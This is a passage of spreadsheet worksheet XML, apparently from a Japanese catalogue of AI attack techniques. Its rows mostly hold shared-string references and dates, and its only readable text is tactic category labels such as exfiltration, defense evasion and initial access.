      </c>
      <c r="B57" s="11" t="s">
        <v>142</v>
      </c>
      <c r="C57" s="15" t="s">
        <v>570</v>
      </c>
      <c r="D57" s="15" t="s">
        <v>571</v>
      </c>
      <c r="E57" s="12" t="s">
        <v>143</v>
      </c>
      <c r="F57" s="13">
        <v>44329</v>
      </c>
      <c r="G57" s="13">
        <v>45756</v>
      </c>
      <c r="H57" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I57" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="58" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A58" s="10" t="s">
        <v>144</v>
      </c>
      <c r="B58" s="11" t="s">
        <v>145</v>
      </c>
      <c r="C58" s="15" t="s">
        <v>572</v>
      </c>
      <c r="D58" s="15" t="s">
        <v>573</v>
      </c>
      <c r="E58" s="12" t="s">
        <v>146</v>
      </c>
      <c r="F58" s="13">
        <v>44985</v>
      </c>
      <c r="G58" s="13">
        <v>44985</v>
      </c>
      <c r="H58" s="10" t="str">
        <f>'tactics (ja)'!C12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I58" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="59" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A59" s="10" t="s">
        <v>147</v>
      </c>
      <c r="B59" s="11" t="s">
        <v>148</v>
      </c>
      <c r="C59" s="15" t="s">
        <v>574</v>
      </c>
      <c r="D59" s="15" t="s">
        <v>575</v>
      </c>
      <c r="E59" s="12" t="s">
        <v>149</v>
      </c>
      <c r="F59" s="13">
        <v>44861</v>
      </c>
      <c r="G59" s="13">
        <v>45224</v>
      </c>
      <c r="H59" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I59" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="60" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A60" s="10" t="s">
        <v>150</v>
      </c>
      <c r="B60" s="11" t="s">
        <v>151</v>
      </c>
      <c r="C60" s="10" t="s">
        <v>576</v>
      </c>
      <c r="D60" s="11" t="s">
        <v>577</v>
      </c>
      <c r="E60" s="12" t="s">
        <v>152</v>
      </c>
      <c r="F60" s="13">
        <v>44329</v>
      </c>
      <c r="G60" s="13">
        <v>45756</v>
      </c>
      <c r="H60" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I60" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="61" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A61" s="10" t="s">
        <v>153</v>
      </c>
      <c r="B61" s="11" t="s">
        <v>154</v>
      </c>
      <c r="C61" s="10" t="s">
        <v>578</v>
      </c>
      <c r="D61" s="11" t="s">
        <v>579</v>
      </c>
      <c r="E61" s="12" t="s">
        <v>155</v>
      </c>
      <c r="F61" s="13">
        <v>45224</v>
      </c>
      <c r="G61" s="13">
        <v>45728</v>
      </c>
      <c r="H61" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I61" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="62" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A62" s="10" t="s">
        <v>156</v>
      </c>
      <c r="B62" s="11" t="s">
        <v>157</v>
      </c>
      <c r="C62" s="10" t="s">
        <v>580</v>
      </c>
      <c r="D62" s="11" t="s">
        <v>581</v>
      </c>
      <c r="E62" s="16" t="s">
        <v>158</v>
      </c>
      <c r="F62" s="13">
        <v>45728</v>
      </c>
      <c r="G62" s="13">
        <v>45986</v>
      </c>
      <c r="H62" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I62" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="63" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A63" s="10" t="s">
        <v>159</v>
      </c>
      <c r="B63" s="11" t="s">
        <v>160</v>
      </c>
      <c r="C63" s="15" t="s">
        <v>582</v>
      </c>
      <c r="D63" s="15" t="s">
        <v>583</v>
      </c>
      <c r="E63" s="12" t="s">
        <v>161</v>
      </c>
      <c r="F63" s="13">
        <v>45224</v>
      </c>
      <c r="G63" s="13">
        <v>45224</v>
      </c>
      <c r="H63" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I63" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="64" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A64" s="10" t="s">
        <v>162</v>
      </c>
      <c r="B64" s="11" t="s">
        <v>163</v>
      </c>
      <c r="C64" s="10" t="s">
        <v>584</v>
      </c>
      <c r="D64" s="21" t="s">
        <v>950</v>
      </c>
      <c r="E64" s="12" t="s">
        <v>164</v>
      </c>
      <c r="F64" s="13">
        <v>44329</v>
      </c>
      <c r="G64" s="13">
        <v>45756</v>
      </c>
      <c r="H64" s="10" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I64" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="65" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A65" s="10" t="s">
        <v>165</v>
      </c>
      <c r="B65" s="11" t="s">
        <v>166</v>
      </c>
      <c r="C65" s="10" t="s">
        <v>585</v>
      </c>
      <c r="D65" s="11" t="s">
        <v>586</v>
      </c>
      <c r="E65" s="12" t="s">
        <v>167</v>
      </c>
      <c r="F65" s="13">
        <v>45728</v>
      </c>
      <c r="G65" s="13">
        <v>45728</v>
      </c>
      <c r="H65" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I65" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="66" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A66" s="29" t="s">
        <v>859</v>
      </c>
      <c r="B66" s="11" t="s">
        <v>861</v>
      </c>
      <c r="C66" s="26" t="s">
        <v>916</v>
      </c>
      <c r="D66" s="21" t="s">
        <v>949</v>
      </c>
      <c r="E66" s="12" t="s">
        <v>863</v>
      </c>
      <c r="F66" s="13">
        <v>45961</v>
      </c>
      <c r="G66" s="13">
        <v>45957</v>
      </c>
      <c r="H66" s="10" t="s">
        <v>34</v>
      </c>
      <c r="I66" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="67" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A67" s="29" t="s">
        <v>860</v>
      </c>
      <c r="B67" s="11" t="s">
        <v>862</v>
      </c>
      <c r="C67" s="26" t="s">
        <v>917</v>
      </c>
      <c r="D67" s="21" t="s">
        <v>948</v>
      </c>
      <c r="E67" s="12" t="s">
        <v>864</v>
      </c>
      <c r="F67" s="13">
        <v>45961</v>
      </c>
      <c r="G67" s="13">
        <v>45965</v>
      </c>
      <c r="H67" s="10" t="s">
        <v>44</v>
      </c>
      <c r="I67" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="68" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A68" s="10" t="s">
        <v>168</v>
      </c>
      <c r="B68" s="11" t="s">
        <v>169</v>
      </c>
      <c r="C68" s="10" t="s">
        <v>587</v>
      </c>
      <c r="D68" s="11" t="s">
        <v>588</v>
      </c>
      <c r="E68" s="12" t="s">
        <v>170</v>
      </c>
      <c r="F68" s="13">
        <v>45728</v>
      </c>
      <c r="G68" s="13">
        <v>45728</v>
      </c>
      <c r="H68" s="10" t="str">
        <f>'tactics (ja)'!C8</f>
        <v>探索</v>
      </c>
      <c r="I68" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="69" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A69" s="10" t="s">
        <v>171</v>
      </c>
      <c r="B69" s="11" t="s">
        <v>172</v>
      </c>
      <c r="C69" s="10" t="s">
        <v>589</v>
      </c>
      <c r="D69" s="11" t="s">
        <v>590</v>
      </c>
      <c r="E69" s="12" t="s">
        <v>173</v>
      </c>
      <c r="F69" s="13">
        <v>44329</v>
      </c>
      <c r="G69" s="13">
        <v>45728</v>
      </c>
      <c r="H69" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I69" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="70" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A70" s="10" t="s">
        <v>174</v>
      </c>
      <c r="B70" s="11" t="s">
        <v>175</v>
      </c>
      <c r="C70" s="10" t="s">
        <v>591</v>
      </c>
      <c r="D70" s="11" t="s">
        <v>592</v>
      </c>
      <c r="E70" s="12" t="s">
        <v>176</v>
      </c>
      <c r="F70" s="13">
        <v>45761</v>
      </c>
      <c r="G70" s="13">
        <v>45761</v>
      </c>
      <c r="H70" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I70" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="71" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A71" s="10" t="s">
        <v>177</v>
      </c>
      <c r="B71" s="11" t="s">
        <v>178</v>
      </c>
      <c r="C71" s="10" t="s">
        <v>593</v>
      </c>
      <c r="D71" s="11" t="s">
        <v>594</v>
      </c>
      <c r="E71" s="12" t="s">
        <v>179</v>
      </c>
      <c r="F71" s="13">
        <v>45224</v>
      </c>
      <c r="G71" s="13">
        <v>45224</v>
      </c>
      <c r="H71" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I71" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="72" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A72" s="10" t="s">
        <v>180</v>
      </c>
      <c r="B72" s="11" t="s">
        <v>181</v>
      </c>
      <c r="C72" s="15" t="s">
        <v>595</v>
      </c>
      <c r="D72" s="11" t="s">
        <v>596</v>
      </c>
      <c r="E72" s="12" t="s">
        <v>182</v>
      </c>
      <c r="F72" s="13">
        <v>44329</v>
      </c>
      <c r="G72" s="13">
        <v>45967</v>
      </c>
      <c r="H72" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I72" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="73" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A73" s="10" t="s">
        <v>183</v>
      </c>
      <c r="B73" s="11" t="s">
        <v>184</v>
      </c>
      <c r="C73" s="15" t="s">
        <v>597</v>
      </c>
      <c r="D73" s="15" t="s">
        <v>598</v>
      </c>
      <c r="E73" s="12" t="s">
        <v>185</v>
      </c>
      <c r="F73" s="13">
        <v>44329</v>
      </c>
      <c r="G73" s="13">
        <v>44329</v>
      </c>
      <c r="H73" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I73" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="74" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A74" s="10" t="s">
        <v>186</v>
      </c>
      <c r="B74" s="11" t="s">
        <v>187</v>
      </c>
      <c r="C74" s="10" t="s">
        <v>599</v>
      </c>
      <c r="D74" s="15" t="s">
        <v>600</v>
      </c>
      <c r="E74" s="12" t="s">
        <v>188</v>
      </c>
      <c r="F74" s="13">
        <v>44329</v>
      </c>
      <c r="G74" s="13">
        <v>45756</v>
      </c>
      <c r="H74" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I74" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="75" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A75" s="10" t="s">
        <v>189</v>
      </c>
      <c r="B75" s="11" t="s">
        <v>190</v>
      </c>
      <c r="C75" s="15" t="s">
        <v>601</v>
      </c>
      <c r="D75" s="15" t="s">
        <v>602</v>
      </c>
      <c r="E75" s="12" t="s">
        <v>191</v>
      </c>
      <c r="F75" s="13">
        <v>44329</v>
      </c>
      <c r="G75" s="13">
        <v>45756</v>
      </c>
      <c r="H75" s="10" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>偵察</v>
      </c>
      <c r="I75" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="76" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A76" s="10" t="s">
        <v>192</v>
      </c>
      <c r="B76" s="11" t="s">
        <v>193</v>
      </c>
      <c r="C76" s="15" t="s">
        <v>603</v>
      </c>
      <c r="D76" s="15" t="s">
        <v>604</v>
      </c>
      <c r="E76" s="12" t="s">
        <v>194</v>
      </c>
      <c r="F76" s="13">
        <v>45224</v>
      </c>
      <c r="G76" s="13">
        <v>45224</v>
      </c>
      <c r="H76" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I76" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="77" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A77" s="10" t="s">
        <v>195</v>
      </c>
      <c r="B77" s="11" t="s">
        <v>196</v>
      </c>
      <c r="C77" s="15" t="s">
        <v>605</v>
      </c>
      <c r="D77" s="15" t="s">
        <v>606</v>
      </c>
      <c r="E77" s="12" t="s">
        <v>197</v>
      </c>
      <c r="F77" s="13">
        <v>45224</v>
      </c>
      <c r="G77" s="13">
        <v>45224</v>
      </c>
      <c r="H77" s="10" t="str">
        <f>'tactics (ja)'!$C$7&amp;"、"&amp;'tactics (ja)'!$C$15</f>
        <v>防御策の回避、権限昇格</v>
      </c>
      <c r="I77" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="78" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A78" s="10" t="s">
        <v>200</v>
      </c>
      <c r="B78" s="11" t="s">
        <v>201</v>
      </c>
      <c r="C78" s="10" t="s">
        <v>607</v>
      </c>
      <c r="D78" s="11" t="s">
        <v>608</v>
      </c>
      <c r="E78" s="12" t="s">
        <v>202</v>
      </c>
      <c r="F78" s="13">
        <v>45728</v>
      </c>
      <c r="G78" s="13">
        <v>45728</v>
      </c>
      <c r="H78" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I78" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="79" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A79" s="10" t="s">
        <v>203</v>
      </c>
      <c r="B79" s="11" t="s">
        <v>204</v>
      </c>
      <c r="C79" s="15" t="s">
        <v>609</v>
      </c>
      <c r="D79" s="15" t="s">
        <v>610</v>
      </c>
      <c r="E79" s="12" t="s">
        <v>205</v>
      </c>
      <c r="F79" s="13">
        <v>45224</v>
      </c>
      <c r="G79" s="13">
        <v>45966</v>
      </c>
      <c r="H79" s="10" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I79" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="80" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A80" s="10" t="s">
        <v>206</v>
      </c>
      <c r="B80" s="11" t="s">
        <v>207</v>
      </c>
      <c r="C80" s="10" t="s">
        <v>611</v>
      </c>
      <c r="D80" s="11" t="s">
        <v>612</v>
      </c>
      <c r="E80" s="12" t="s">
        <v>208</v>
      </c>
      <c r="F80" s="13">
        <v>45728</v>
      </c>
      <c r="G80" s="13">
        <v>45728</v>
      </c>
      <c r="H80" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I80" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="81" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A81" s="10" t="s">
        <v>209</v>
      </c>
      <c r="B81" s="11" t="s">
        <v>210</v>
      </c>
      <c r="C81" s="10" t="s">
        <v>613</v>
      </c>
      <c r="D81" s="11" t="s">
        <v>614</v>
      </c>
      <c r="E81" s="12" t="s">
        <v>211</v>
      </c>
      <c r="F81" s="13">
        <v>45728</v>
      </c>
      <c r="G81" s="13">
        <v>45728</v>
      </c>
      <c r="H81" s="10" t="str">
        <f>'tactics (ja)'!$C$14</f>
        <v>永続化</v>
      </c>
      <c r="I81" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="82" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A82" s="10" t="s">
        <v>213</v>
      </c>
      <c r="B82" s="11" t="s">
        <v>214</v>
      </c>
      <c r="C82" s="10" t="s">
        <v>615</v>
      </c>
      <c r="D82" s="11" t="s">
        <v>616</v>
      </c>
      <c r="E82" s="12" t="s">
        <v>215</v>
      </c>
      <c r="F82" s="13">
        <v>45762</v>
      </c>
      <c r="G82" s="13">
        <v>45762</v>
      </c>
      <c r="H82" s="10" t="str">
        <f>'tactics (ja)'!$C$10</f>
        <v>持出し</v>
      </c>
      <c r="I82" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="83" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A83" s="10" t="s">
        <v>216</v>
      </c>
      <c r="B83" s="11" t="s">
        <v>217</v>
      </c>
      <c r="C83" s="10" t="s">
        <v>617</v>
      </c>
      <c r="D83" s="11" t="s">
        <v>618</v>
      </c>
      <c r="E83" s="12" t="s">
        <v>218</v>
      </c>
      <c r="F83" s="13">
        <v>45728</v>
      </c>
      <c r="G83" s="13">
        <v>45728</v>
      </c>
      <c r="H83" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I83" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="84" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A84" s="10" t="s">
        <v>219</v>
      </c>
      <c r="B84" s="11" t="s">
        <v>220</v>
      </c>
      <c r="C84" s="10" t="s">
        <v>619</v>
      </c>
      <c r="D84" s="11" t="s">
        <v>620</v>
      </c>
      <c r="E84" s="12" t="s">
        <v>221</v>
      </c>
      <c r="F84" s="13">
        <v>45728</v>
      </c>
      <c r="G84" s="13">
        <v>45728</v>
      </c>
      <c r="H84" s="10" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I84" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="85" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A85" s="10" t="s">
        <v>222</v>
      </c>
      <c r="B85" s="11" t="s">
        <v>223</v>
      </c>
      <c r="C85" s="10" t="s">
        <v>621</v>
      </c>
      <c r="D85" s="11" t="s">
        <v>622</v>
      </c>
      <c r="E85" s="12" t="s">
        <v>224</v>
      </c>
      <c r="F85" s="13">
        <v>44329</v>
      </c>
      <c r="G85" s="13">
        <v>45761</v>
      </c>
      <c r="H85" s="10" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$14</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I85" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="86" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A86" s="29" t="s">
        <v>865</v>
      </c>
      <c r="B86" s="11" t="s">
        <v>866</v>
      </c>
      <c r="C86" s="26" t="s">
        <v>918</v>
      </c>
      <c r="D86" s="21" t="s">
        <v>944</v>
      </c>
      <c r="E86" s="12" t="s">
        <v>867</v>
      </c>
      <c r="F86" s="13">
        <v>45957</v>
      </c>
      <c r="G86" s="13">
        <v>45965</v>
      </c>
      <c r="H86" s="10" t="s">
        <v>51</v>
      </c>
      <c r="I86" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="87" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A87" s="10" t="s">
        <v>225</v>
      </c>
      <c r="B87" s="11" t="s">
        <v>226</v>
      </c>
      <c r="C87" s="10" t="s">
        <v>623</v>
      </c>
      <c r="D87" s="15" t="s">
        <v>624</v>
      </c>
      <c r="E87" s="12" t="s">
        <v>227</v>
      </c>
      <c r="F87" s="13">
        <v>44329</v>
      </c>
      <c r="G87" s="13">
        <v>44329</v>
      </c>
      <c r="H87" s="10" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I87" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="88" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A88" s="10" t="s">
        <v>228</v>
      </c>
      <c r="B88" s="11" t="s">
        <v>229</v>
      </c>
      <c r="C88" s="10" t="s">
        <v>625</v>
      </c>
      <c r="D88" s="11" t="s">
        <v>626</v>
      </c>
      <c r="E88" s="12" t="s">
        <v>230</v>
      </c>
      <c r="F88" s="13">
        <v>45761</v>
      </c>
      <c r="G88" s="13">
        <v>45761</v>
      </c>
      <c r="H88" s="10" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I88" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="89" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A89" s="29" t="s">
        <v>868</v>
      </c>
      <c r="B89" s="11" t="s">
        <v>869</v>
      </c>
      <c r="C89" s="26" t="s">
        <v>919</v>
      </c>
      <c r="D89" s="21" t="s">
        <v>945</v>
      </c>
      <c r="E89" s="12" t="s">
        <v>870</v>
      </c>
      <c r="F89" s="13">
        <v>45930</v>
      </c>
      <c r="G89" s="13">
        <v>45930</v>
      </c>
      <c r="H89" s="10" t="s">
        <v>212</v>
      </c>
      <c r="I89" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="90" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A90" s="10" t="s">
        <v>231</v>
      </c>
      <c r="B90" s="11" t="s">
        <v>232</v>
      </c>
      <c r="C90" s="10" t="s">
        <v>627</v>
      </c>
      <c r="D90" s="15" t="s">
        <v>628</v>
      </c>
      <c r="E90" s="16" t="s">
        <v>233</v>
      </c>
      <c r="F90" s="13">
        <v>44329</v>
      </c>
      <c r="G90" s="13">
        <v>45756</v>
      </c>
      <c r="H90" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I90" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="91" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A91" s="10" t="s">
        <v>234</v>
      </c>
      <c r="B91" s="11" t="s">
        <v>235</v>
      </c>
      <c r="C91" s="10" t="s">
        <v>629</v>
      </c>
      <c r="D91" s="15" t="s">
        <v>630</v>
      </c>
      <c r="E91" s="12" t="s">
        <v>236</v>
      </c>
      <c r="F91" s="13">
        <v>44329</v>
      </c>
      <c r="G91" s="13">
        <v>44985</v>
      </c>
      <c r="H91" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I91" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="92" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A92" s="29" t="s">
        <v>871</v>
      </c>
      <c r="B92" s="11" t="s">
        <v>872</v>
      </c>
      <c r="C92" s="26" t="s">
        <v>920</v>
      </c>
      <c r="D92" s="21" t="s">
        <v>946</v>
      </c>
      <c r="E92" s="12" t="s">
        <v>873</v>
      </c>
      <c r="F92" s="13">
        <v>45930</v>
      </c>
      <c r="G92" s="13">
        <v>45930</v>
      </c>
      <c r="H92" s="10" t="s">
        <v>212</v>
      </c>
      <c r="I92" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="93" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A93" s="10" t="s">
        <v>237</v>
      </c>
      <c r="B93" s="11" t="s">
        <v>238</v>
      </c>
      <c r="C93" s="10" t="s">
        <v>631</v>
      </c>
      <c r="D93" s="11" t="s">
        <v>632</v>
      </c>
      <c r="E93" s="12" t="s">
        <v>239</v>
      </c>
      <c r="F93" s="13">
        <v>44329</v>
      </c>
      <c r="G93" s="13">
        <v>45393</v>
      </c>
      <c r="H93" s="10" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$14</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I93" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="94" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A94" s="29" t="s">
        <v>874</v>
      </c>
      <c r="B94" s="11" t="s">
        <v>875</v>
      </c>
      <c r="C94" s="26" t="s">
        <v>921</v>
      </c>
      <c r="D94" s="21" t="s">
        <v>947</v>
      </c>
      <c r="E94" s="12" t="s">
        <v>876</v>
      </c>
      <c r="F94" s="13">
        <v>45957</v>
      </c>
      <c r="G94" s="13">
        <v>45965</v>
      </c>
      <c r="H94" s="10" t="s">
        <v>336</v>
      </c>
      <c r="I94" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="95" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A95" s="10" t="s">
        <v>240</v>
      </c>
      <c r="B95" s="11" t="s">
        <v>241</v>
      </c>
      <c r="C95" s="15" t="s">
        <v>633</v>
      </c>
      <c r="D95" s="15" t="s">
        <v>634</v>
      </c>
      <c r="E95" s="12" t="s">
        <v>242</v>
      </c>
      <c r="F95" s="13">
        <v>44329</v>
      </c>
      <c r="G95" s="13">
        <v>45756</v>
      </c>
      <c r="H95" s="10" t="str">
        <f>'tactics (ja)'!$C$17</f>
        <v>リソースの開発</v>
      </c>
      <c r="I95" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="96" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A96" s="10" t="s">
        <v>243</v>
      </c>
      <c r="B96" s="11" t="s">
        <v>244</v>
      </c>
      <c r="C96" s="10" t="s">
        <v>635</v>
      </c>
      <c r="D96" s="15" t="s">
        <v>636</v>
      </c>
      <c r="E96" s="12" t="s">
        <v>245</v>
      </c>
      <c r="F96" s="13">
        <v>45224</v>
      </c>
      <c r="G96" s="13">
        <v>45224</v>
      </c>
      <c r="H96" s="10" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I96" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="97" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A97" s="10" t="s">
        <v>246</v>
      </c>
      <c r="B97" s="11" t="s">
        <v>247</v>
      </c>
      <c r="C97" s="10" t="s">
        <v>637</v>
      </c>
      <c r="D97" s="11" t="s">
        <v>638</v>
      </c>
      <c r="E97" s="12" t="s">
        <v>248</v>
      </c>
      <c r="F97" s="13">
        <v>45728</v>
      </c>
      <c r="G97" s="13">
        <v>45728</v>
      </c>
      <c r="H97" s="10" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I97" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="98" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A98" s="10" t="s">
        <v>249</v>
      </c>
      <c r="B98" s="11" t="s">
        <v>250</v>
      </c>
      <c r="C98" s="15" t="s">
        <v>639</v>
      </c>
      <c r="D98" s="15" t="s">
        <v>640</v>
      </c>
      <c r="E98" s="12" t="s">
        <v>251</v>
      </c>
      <c r="F98" s="13">
        <v>44329</v>
      </c>
      <c r="G98" s="13">
        <v>44329</v>
      </c>
      <c r="H98" s="10" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I98" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="99" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A99" s="10" t="s">
        <v>252</v>
      </c>
      <c r="B99" s="11" t="s">
        <v>253</v>
      </c>
      <c r="C99" s="10" t="s">
        <v>641</v>
      </c>
      <c r="D99" s="11" t="s">
        <v>642</v>
      </c>
      <c r="E99" s="12" t="s">
        <v>254</v>
      </c>
      <c r="F99" s="13">
        <v>44329</v>
      </c>
      <c r="G99" s="13">
        <v>45393</v>
      </c>
      <c r="H99" s="10" t="str">
        <f>'tactics (ja)'!$C$2&amp;"、"&amp;'tactics (ja)'!$C$14</f>
        <v>AI 攻撃のステージング、永続化</v>
      </c>
      <c r="I99" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="100" spans="1:9" ht="60" x14ac:dyDescent="0.2">
      <c r="A100" s="10" t="s">
        <v>255</v>
      </c>
      <c r="B100" s="11" t="s">
        <v>256</v>
      </c>
      <c r="C100" s="10" t="s">
        <v>643</v>
      </c>
      <c r="D100" s="15" t="s">
        <v>644</v>
      </c>
      <c r="E100" s="12" t="s">
        <v>257</v>
      </c>
      <c r="F100" s="13">
        <v>44329</v>
      </c>
      <c r="G100" s="13">
        <v>45756</v>
      </c>
      <c r="H100" s="10" t="str">
        <f>'tactics (ja)'!$C$14&amp;"、"&amp;'tactics (ja)'!$C$17</f>
        <v>永続化、リソースの開発</v>
      </c>
      <c r="I100" s="10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="101" spans="1:9" ht="30" x14ac:dyDescent="0.2">
      <c r="A101" s="10" t="s">
        <v>258</v>
      </c>
      <c r="B101" s="11" t="s">
        <v>259</v>
      </c>
      <c r="C101" s="15" t="s">
        <v>645</v>
      </c>
      <c r="D101" s="15" t="s">
